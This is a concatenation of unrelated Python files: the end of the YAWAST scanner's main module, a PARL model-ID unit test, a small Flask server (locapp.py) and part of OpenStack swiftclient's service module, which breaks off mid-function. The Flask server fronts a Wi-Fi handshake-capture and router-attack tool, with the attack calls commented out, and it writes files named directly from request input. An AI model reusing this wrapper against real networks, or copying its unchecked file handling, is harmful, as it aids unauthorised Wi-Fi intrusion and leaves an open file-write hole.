f" CPU(s): {psutil.cpu_count()}@{cpu_max}MHz - RAM: {mem_total} ({mem_avail} Available)"
)
output.print_color(Fore.CYAN, " " + _get_version_info())
print()
print(f" Started at {start_time}")
print("")
print("Connection Status:")
print(f" {network.check_ipv4_connection()}")
print(f" {network.check_ipv6_connection()}")
print()
def signal_handler(sig, frame):
if sig == signal.SIGINT:
# check to see if we are a worker, or the main process
if current_process().name == "MainProcess":
output.empty()
output.norm("Scan cancelled by user.")
_shutdown()
try:
active_children()
except:
# we don't care if this fails
pass
sys.exit(1)
def _shutdown():
global _start_time, _monitor, _has_shutdown
if _has_shutdown:
return
_has_shutdown = True
output.debug("Shutting down...")
elapsed = datetime.now() - _start_time
mem_res = "{0:cM}".format(Size(_monitor.peak_mem_res))
output.empty()
output.norm(f"Completed (Elapsed: {str(elapsed)} - Peak Memory: {mem_res})")
if reporter.get_output_file() != "":
with Spinner():
reporter.save_output()
def _get_locale() -> str:
# get the locale
try:
locale.setlocale(locale.LC_ALL, "")
lcl = locale.getdefaultlocale()
except Exception as error:
print(
f"Unable to get Locale: {str(error)} - attempting to force locale to en_US.utf8"
)
try:
if platform.system() == "Darwin":
locale.setlocale(locale.LC_ALL, "EN_US")
else:
locale.setlocale(locale.LC_ALL, "en_US.utf8")
lcl = locale.getdefaultlocale()
except Exception as err:
print(f"Unable to set locale: {str(err)}")
return "(Unknown locale)"
if lcl is not None:
loc = f"{lcl[0]}.{lcl[1]}"
else:
loc = "(Unknown locale)"
return loc
def _set_basic_info():
reporter.register_info("start_time", int(time.time()))
reporter.register_info("yawast_version", get_version())
reporter.register_info(
"python_version",
f"{''.join(sys.version.splitlines())} ({platform.python_implementation()})",
)
reporter.register_info("openssl_version", ssl.OPENSSL_VERSION)
reporter.register_info("platform", platform.platform())
reporter.register_info("options", str(sys.argv))
reporter.register_info("encoding", _get_locale())
def _get_version_info() -> str:
try:
data, code = network.http_json("https://pypi.org/pypi/yawast/json")
except Exception:
output.debug_exception()
return "Supported Version: (Unable to get version information)"
if code != 200:
ret = "Supported Version: (PyPi returned an error code while fetching current version)"
else:
if "info" in data and "version" in data["info"]:
ver = cast(version.Version, version.parse(get_version()))
curr_version = cast(version.Version, version.parse(data["info"]["version"]))
ret = f"Supported Version: {curr_version} - "
if ver == curr_version:
ret += "You are on the latest version."
elif ver > curr_version or "dev" in get_version():
ret += "You are on a pre-release version. Take care."
else:
ret += "Please update to the current version."
else:
ret = "Supported Version: (PyPi returned invalid data while fetching current version)"
return ret
class _KeyMonitor:
busy = False
def wait_task(self):
if sys.stdout.isatty():
while self.busy:
try:
key = getchar()
if key != "":
output.debug(f"Received from keyboard: {key}")
if key == "d":
output.toggle_debug()
time.sleep(0.1)
except Exception:
output.debug_exception()
self.busy = False
pass
else:
# if this isn't a TTY, no point in doing any of this
self.busy = False
def __enter__(self):
self.busy = True
threading.Thread(target=self.wait_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
if exception is not None:
return False
class _ProcessMonitor:
WARNING_THRESHOLD = 100 * 1024 * 1024
busy = False
def __init__(self):
self.process = Process()
self.peak_mem_res = 0
self.low_mem_warning = False
def monitor_task(self):
if sys.stdout.isatty():
while self.busy:
try:
# only print the data out every 10 seconds
if datetime.now().second % 10 == 0:
info = self._get_info()
output.debug(info)
else:
# call get_mem so that we record peak more accurately
self._get_mem()
time.sleep(1)
except Exception:
output.debug_exception()
self.busy = False
pass
else:
# if this isn't a TTY, no point in doing any of this
self.busy = False
def _get_info(self) -> str:
from yawast.external.memory_size import Size
# prime the call to cpu_percent, as the first call doesn't return useful data
self.process.cpu_percent(interval=1)
# use oneshot() to cache the data, so we minimize hits
with self.process.oneshot():
pct = self.process.cpu_percent()
times = self.process.cpu_times()
mem = self._get_mem()
mem_res = "{0:cM}".format(Size(mem.rss))
mem_virt = "{0:cM}".format(Size(mem.vms))
thr = self.process.num_threads()
vm = psutil.virtual_memory()
mem_total = "{0:cM}".format(Size(vm.total))
mem_avail_bytes = vm.available
mem_avail = "{0:cM}".format(Size(vm.available))
if mem_avail_bytes < self.WARNING_THRESHOLD and not self.low_mem_warning:
self.low_mem_warning = True
output.error(f"Low RAM Available: {mem_avail}")
cons = -1
try:
cons = len(self.process.connections(kind="inet"))
except Exception:
# we don't care if this fails
output.debug_exception()
cpu_freq = psutil.cpu_freq()
info = (
f"Process Stats: CPU: {pct}% - Sys: {times.system} - "
f"User: {times.user} - Res: {mem_res} - Virt: {mem_virt} - "
f"Available: {mem_avail}/{mem_total} - Threads: {thr} - "
f"Connections: {cons} - CPU Freq: "
f"{int(cpu_freq.current)}MHz/{int(cpu_freq.max)}MHz"
)
return info
def _get_mem(self):
mem = self.process.memory_info()
if mem.rss > self.peak_mem_res:
self.peak_mem_res = mem.rss
output.debug(f"New high-memory threshold: {self.peak_mem_res}")
return mem
def __enter__(self):
self.busy = True
threading.Thread(target=self.monitor_task).start()
return self
def __exit__(self, exception, value, tb):
self.busy = False
if exception is not None:
return False
|
model_helper_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from parl.core.model_helper import global_model_helper
from six.moves.queue import Queue
class GlobalModelHelperTest(unittest.TestCase):
def test_generate_model_id(self):
id1 = global_model_helper.generate_model_id()
id2 = global_model_helper.generate_model_id()
self.assertNotEqual(id1, id2)
def _gen_model_id(self, q):
model_id = global_model_helper.generate_model_id()
q.put(model_id)
def test_generate_model_id_with_multi_thread(self):
q = Queue()
t1 = threading.Thread(target=self._gen_model_id, args=(q, ))
t2 = threading.Thread(target=self._gen_model_id, args=(q, ))
t1.start()
t2.start()
t1.join()
t2.join()
id1 = q.get()
id2 = q.get()
self.assertNotEqual(id1, id2)
def test_register_model_id(self):
global_model_helper.register_model_id('my_model_0')
global_model_helper.register_model_id('my_model_1')
with self.assertRaises(AssertionError):
global_model_helper.register_model_id('my_model_0')
def _register_model_id(self, q):
try:
global_model_helper.register_model_id('my_model_2')
except AssertionError:
q.put(False)
else:
q.put(True)
def test_register_model_id_with_multi_thread(self):
q = Queue()
t1 = threading.Thread(target=self._register_model_id, args=(q, ))
t2 = threading.Thread(target=self._register_model_id, args=(q, ))
t1.start()
t2.start()
t1.join()
t2.join()
return1 = q.get()
return2 = q.get()
assert (return1 is True and return2 is False) or \
(return1 is False and return2 is True)
def test_register_model_id_with_used_model_id(self):
model_id = global_model_helper.generate_model_id()
with self.assertRaises(AssertionError):
global_model_helper.register_model_id(model_id)
if __name__ == '__main__':
unittest.main()
|
locapp.py
|
# coding:utf-8
import threading
from flask import Flask, request, Response, send_from_directory, make_response, render_template
import json
import gevent.monkey
from gevent.pywsgi import WSGIServer
import redis
from flask_cors import CORS
gevent.monkey.patch_all()
# internal imports
from wifilist.mongoquery import getquerydate
from wifilist.getwifihandshake import HANDSHAKE
from wifilist.routeattack import ROUTE
app = Flask(__name__)
CORS(app)
@app.route('/')
def root():
return render_template('swmfile.html')
@app.route('/api/mongodata', methods=['get'])
def sendmongodata():
responsedata = getquerydate()
return Response(responsedata, mimetype="application/json")
@app.route('/api/startcollect', methods=['post'])
def starttheserver():
args = json.loads(request.data)
# force-cast to make sure seconds is an int
seconds = int(args['seconds'])
if int(args['start']) == 1:
# control = CONTROL(seconds)
# thread1 = threading.Thread(target=control.start)
# thread2 = threading.Thread(target=control.killshell)
# thread1.start()
# thread2.start()
# thread1.join()
# thread2.join()
info = {"complete": 1}
else:
info = {"complete": 0, "error": "something wrong with you!"}
response = Response(json.dumps(info), mimetype="application/json")
return response
@app.route('/api/handshake', methods=['post'])
def collecthandshake():
args = json.loads(request.data)
open(args['wifi'], "w+").close()
# handshake = HANDSHAKE(args['mac'], int(args['ch']), args['wifi'])
# router = ROUTE(args['mac'])
# t1 = threading.Thread(target=handshake.starthandshake)
# t2 = threading.Thread(target=router.start)
# t1.start()
# t2.start()
# t2.join()
# t1.join()
# from terminal.allconfig import conf
# r = redis.Redis(host=conf['redishost'], port=conf['redisport'])
# get = r.hget("handshake", "GET")
if args is not None:
info = {"complete": 1}
else:
info = {"complete": 0, "error": "Failed get wifi handshake"}
return Response(json.dumps(info), mimetype="application/json")
@app.route('/api/download/<wifi>', methods=['GET'])
def download(wifi):
filepath = './'
filename = '{}'.format(wifi)
# handle Chinese (non-ASCII) filenames
response = make_response(send_from_directory(directory=filepath, filename=filename, as_attachment=True))
# except:
# info = {"complete": 0, "error": "No such file, scan wifi failed"}
# return Response(json.dumps(info), mimetype="application/json")
response.headers["Content-Disposition"] = "attachment; filename={}".format(filename.encode().decode('latin-1'))
return response
if __name__ == '__main__':
http_server = WSGIServer(('0.0.0.0', 8014), app)
try:
print("Start at " + http_server.server_host +
':' + str(http_server.server_port))
http_server.serve_forever()
except(KeyboardInterrupt):
print('Exit...')
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import os
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import time
from threading import Thread
from six import Iterator, StringIO, string_types, text_type
from six.moves.queue import Queue
from six.moves.queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
import json
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups, split_request_headers,
n_at_a_time
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
DISK_BUFFER = 2 ** 16
logger = logging.getLogger("swiftclient.service")
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
}
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False,
'destination': None,
'fresh_metadata': False,
'ignore_mtime': False,
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'])
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: Must be one of:
* an iterable of 'Key: Value' strings
* an iterable of ('Key', 'Value') pairs
* a dict of {'Key': 'Value'} pairs
:param prefix: String to prepend to all of the keys in the dictionary.
"""
headers = {}
try:
headers = split_request_headers(options, prefix)
except ValueError as e:
raise SwiftError(e)
return headers
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftCopyObject(object):
"""
Class for specifying an object copy,
allowing the destination/headers/metadata/fresh_metadata to be specified
separately for each individual object.
destination and fresh_metadata should be set in options
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
if self.options is None:
self.destination = None
self.fresh_metadata = False
else:
self.destination = self.options.get('destination')
self.fresh_metadata = self.options.get('fresh_metadata', False)
if self.destination is not None:
destination_components = self.destination.split('/')
if destination_components[0] or len(destination_components) < 2:
raise SwiftError("destination must be in format /cont[/obj]")
if not destination_components[-1]:
raise SwiftError("destination must not end in a slash")
if len(destination_components) == 2:
# only container set in destination
self.destination = "{0}/{1}".format(
self.destination, object_name
)
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_md5 = headers.get('etag', '')
if len(self._expected_md5) > 1 and self._expected_md5[0] == '"' \
and self._expected_md5[-1] == '"':
self._expected_md5 = self._expected_md5[1:-1]
# Some headers indicate the MD5 of the response
# definitely *won't* match the ETag
bad_md5_headers = set([
'content-range',
'x-object-manifest',
'x-static-large-object',
])
if bad_md5_headers.intersection(headers):
# This isn't a useful checksum
self._expected_md5 = ''
if self._expected_md5 and checksum:
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_md5:
etag = self._actual_md5.hexdigest()
if etag != self._expected_md5:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_md5))
if (self._content_length is not None
and self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
create_connection = lambda: get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False,
'header': []
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
'header': []
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10)  # bound the queue so a long listing cannot consume unbounded memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
req_headers = split_headers(options.get('header', []))
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix'],
headers=req_headers
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
error = None
req_headers = split_headers(options.get('header', []))
try:
while True:
_, items = conn.get_container(
container, marker=marker, prefix=options['prefix'],
delimiter=options['delimiter'], headers=req_headers
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
